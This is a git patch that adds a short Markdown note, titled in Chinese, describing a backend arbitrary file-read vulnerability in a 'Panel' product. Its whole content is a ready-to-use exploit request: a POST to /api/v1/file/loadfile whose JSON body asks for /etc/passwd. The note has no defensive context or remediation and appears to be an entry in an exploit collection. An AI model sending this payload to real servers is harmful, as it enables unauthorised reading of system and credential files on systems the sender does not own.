From 8a3514fa1c8c3a4a8d2cddcb5cb4a634c063e866 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:33:44 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Panel=20loadfile=20=E5=90=8E=E5=8F=B0?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Panel loadfile 后台文件读取漏洞.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Panel loadfile 后台文件读取漏洞.md diff --git a/Panel loadfile 后台文件读取漏洞.md b/Panel loadfile 后台文件读取漏洞.md new file mode 100644 index 0000000..767f98c --- /dev/null +++ b/Panel loadfile 后台文件读取漏洞.md @@ -0,0 +1,5 @@ +## Panel loadfile 后台文件读取漏洞 +``` +POST /api/v1/file/loadfile +{"paht":"/etc/passwd"} +```